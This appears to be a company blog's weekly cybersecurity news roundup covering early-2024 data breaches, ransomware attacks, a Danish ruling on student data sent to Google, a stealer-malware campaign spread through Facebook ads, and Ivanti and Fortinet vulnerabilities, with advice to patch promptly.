Last week, breaches and cyberattacks occurred across several industries from the public sector, IT, automotive, telecommunications, ride-sharing to the healthcare industry. Devastating consequences have been uncovered from earlier data breaches and attacks, such as over 2 million job seeker’s personal information stolen after compromising 65 legitimate job listing and retail sites. In other news, Denmark has issued an injunction to stop schools from funnelling student data to Google, and a new password stealing malware has been found to be spreading through fake advertisements on Facebook. Furthermore, new vulnerabilities and patches have also been found and released. It is highly recommended to not only be aware of them but to also update them as soon as possible. Read on to receive a quick summary of what happened this week in the space of cybersecurity. A French healthcare services firm suffered a data breach: Data of policyholders and healthcare professionals in France exposed. French healthcare services firm Viamedis announced on LinkedIn that they were hit by a cyberattack that exposed the data of policyholders and healthcare professionals in France. The exposed data includes beneficiary’s birth date, social security number, marital status, name of health insurer and guarantees open to 3rd party payment. Viamedis clarified that the breached systems did not store people’s banking information, postal details, telephone numbers, and email addresses. The company has stated that they will be sending different notifications about the type of data exposed to healthcare professionals. The company has informed impacted health organisations, filed a complaint with the public prosecutor, and notified the relevant authorities. Viamedis has also stated that investigation is still underway to determine the impact and scope of the breach. Along with Viamedis, it was also found that Alemery, another operator responsible for managing 3rd party payments for supplementary health insurance also suffered a data breach. From both companies, it was found that the data breach affects approximately 33 million insured French citizens in total. Almerys stated that the hackers did not breach their central system, but did access a portal used by health professionals. The company has filed complaints with the public prosecutor and an investigation is underway. With 33 million citizens affected, this makes it one of the largest data breaches in France. Major data breach in Thailand exposes nearly 20 million elderly Thai citizens’ personal information. The Department of Older Persons (DOP) which is under the Ministry of Social Development and Human Security in Thailand has been breached resulting in the personal identifiable information (PII) of 19,718,687 elderly Thai citizens leaked. This exposed information includes their names, ID card numbers, phone numbers, emails, salaries and personal photographs. The breach has resulted in at least 14 cases of cybercrime, with the origin of the breach still unidentified. After the discovery of the leak, the DOP immediately lodged a complaint with the Thai cyber police and the Committee for the Protection of Personal Information. The incident is currently under investigation to determine the origin of the leak - if it was the result of insider access or external hacking. HPE investigates claims of a new data breach after data for sale on a hacking forum. Hewlett Packard Enterprise (HPE) is investigating a new data breach after it was discovered that a threat actor has put up allegedly stolen data for sale on a hacking forum. The threat actor has claimed it contains HPE credentials and other sensitive information. The company has told BleepingComputer that they have not found any evidence of a data breach nor any impact to HPE products or services, and no ransom was requested, but they are investigating the threat actor’s claims. The threat actor, IntelBroker, has shared screenshots of the claimed stolen HPE credentials but has yet to disclose the source of the stolen data or how they obtained them. The threat actor claim that the stolen data includes CI/CD access, System logs, Config Files, Access Tokens, HPE StoreOnce Files (serial numbers warrant etc), Access passwords as well as email services. Hyundai Motor Europe suffered a BlackBasta ransomware attack. Hyundai Motor Europe was hit by a BlackBasta ransomware attack, with the threat actors claiming to have stolen 3TB of corporate data. As told to BleepingComputer, Hyundai Motor Europe is investigating the attack in which BlackBasta managed to access a “limited part of [their] network”. Investigations are currently underway, and Hyundai Motor Europe are currently working with 3rd party cybersecurity and legal experts. The company also adds that relevant authorities have been notified. In an image seen by BleepingComputer, BlackBasta shared lists of folders that were allegedly stolen from numerous Windows domains, including those from KIA Europe. Although it is unclear the exact type of data stolen, the folder names indicate its related to various departments at the company - legal, sales, human resources, accounting, IT and management. Internal Verizon breach exposed more than 63,000 employees’ personal data. 63,206 Verizon employees (which is about half of the company’s workforce) have become victims of a data breach which resulted from a staff member gaining unauthorised access to a file that contains personnel records. Majority of employees impacted were current Verizon employees, but there is also a small number impacted that were former employees. In a letter sent to affected employees, Verizon stated that they discovered the breach on 12 December, and that around 21st September 2023, the staff member obtained the file “without authorisation and in violation of company policy”. The compromised personal information includes the employees’ name, address, social security number or another national identifier, gender, union affiliation, birth date, and compensation information. In the letter, the company further states that they have no evidence that the compromised information has been misused or shared outside of Verizon, and that they are working to enhance their technical controls to prevent this type of situation from recurring. In their data breach notification filed with the Office of the Maine Attorney General, the breach was described as “inadvertent disclosure, insider wrongdoing”. From their internal review of the incident, the breach was not of malicious intent, and hence did not refer the incident to law enforcement. Verizon has also arranged to provide complimentary credit monitoring and identity protection services to those impacted for 24 months. HopSkipDrive confirmed data breach: More than 155,00 drivers’ personal information compromised. In a filing with Maine’s attorney general last week, HopSkipDrive, a student rideshare startup, confirmed that they had suffered a cybersecurity incident in June that resulted in a data breach that affected 155,394 drivers’ personal information. The stolen data includes their names, email addresses, postal addresses, driver licence numbers, and other non-driver identification card numbers. HopSkipDrive spokesperson, Campbell Millum, said that those affected include people who drive on their platform or who applied to drive on their platform, and that no employee or customer data was accessed in the breach. In a letter sent to those compromised, HopSkipDrive stated that they became aware of the cybersecurity breach after receiving an email from an unknown threat actor. After which, they launched an investigation with 3rd party experts which determined that the incident occurred between 31 May - 10 June 2023. HopSkipDrive stated that they are committed to strengthening their systems to prevent such incidents from occurring again. Threat group stole over 2 million job seekers’ personal information in SQL injection and XSS attacks. ResumeLooters, a threat group, has stolen 2,079,027 job seekers’ personal data after compromising 65 legitimate job listing and retail sites. The attackers mainly focus on the APAC region, targeting sites in Taiwan, China, India, Thailand, Vietnam and Australia to steal job seekers’ names, email addresses, phone numbers, education, employment history, and other relevant information. According to Group-IB, which followed the threat group since its beginning, ResumeLooters attempted to sell the stolen data through Telegram channels. ResumeLooters primarily use SQL injection and cross-site scripting (XXS) to breach targeted sites. After identifying and exploiting security weaknesses on target sites, ResumeLooters injects malicious scripts into a website’s HTML, which will display phishing forms to steal visitors’ information. Denmark issues an injunction to stop schools from funnelling student data to Google. The Danish data protection authority (Datatilsynet) has issued an injunction to stop schools from funnelling student data to Google through the use of Chromebooks and Google Workspace services. This issue was brought to the agency’s attention around 4 years ago via a concerned parent. The agency has now decided that the method of transferring students’ personal data to Google does not have a legal basis for all disclosed purposes. Therefore, 53 municipalities in Denmark must adjust their data processing practices. The municipalities are ordered to: (1) Cease the transfer of personal data to Google or obtain a clear legal basis for such transferred, (2) Analyse and document how personal data is processed before using tools like Google Workspace, and (3) Ensure that Google refrains from processing any data it receives for non-complementary purposes. Non-permissible cases are purposes related to maintaining and improving Google Workspace for Education, ChromeOS, and the Chrome Browser, including measuring performance or developing new features and services for these platforms. The agency’s decision does not directly translate to a ban on Chromebooks (which are widely used in Danish schools) but it does impose significant restrictions on how personal data can be shared with Google. New password-stealing malware spreading via Facebook ads. A new password-stealing malware called Ov3r_Stealer, is being spread through fake job advertisements on Facebook. This malware is aimed to steal account credentials and cryptocurrency. The fake job ads are for management positions which invites them to apply for an Account Manager position in digital advertising. But it will lead users to a Discord URL where a PowerShell script downloads the malware payload from a GitHub repository. Trustwave analysts who discovered the malware states that this malware campaign is a severe threat to many potential victims due to how extensively Facebook is used as a social media platform. Ov3r_Stealer attempts to steal data from a broad range of apps such as cryptocurrency wallet apps, web browsers, browser extensions (e.g. Google Authenticator, FreeOTP), Discord, Filezilla and many others. The malware will collect the information they can find on the infected computer every 90 minutes and send it to a Telegram bot. This also includes the victim’s geolocation information and a summary of the stolen data. Ivanti warns of new authentication bypass vulnerability: Urges admins to patch new Connect Secure immediately. On 8 February, Ivanti warned of a new authentication bypass vulnerability (tracked as CVE-2024-22024) that impacts Connect Secure, Policy Secure and ZTA gateways.They have urged admins to secure their appliances immediately. This flaw lets remote attackers gain access to restricted resources on unpatched appliances in low-complexity attacks without the need of user interaction or authentication. Ivanti stated that they have so far found no evidence of their customers being exploited via this vulnerability but it is critical for their customers to take action immediately to ensure that they will be protected fully. CISA: New Fortinet RCE bug is being actively exploited. CISA confirmed on 11 February that attackers are actively exploiting a critical remote code execution (RCE) bug (tracked as CVE-2024-21762) that has been patched by Fortinent last Thursday. This bug can let unauthenticated attackers to remotely execute arbitrary code using malicious HTTP requests. It is highly recommended that admins immediately update to the latest version to prevent this from happening. However, if admins cannot immediately deploy security updates, they can remove the attack vector by disabling SSL VPN on the device. CISA has ordered US federal agencies to secure FortiOS and FortiProxy devices against this vulnerability within 7 days (by 16 February). That is all! Enjoy the rest of the week and don't forget to update your devices and systems to the latest patches! Comments are closed.
|
Archives
June 2024
Categories
All
|
© 2021, TAFA HOLDINGS (S) PTE LTD. ALL RIGHTS RESERVED
|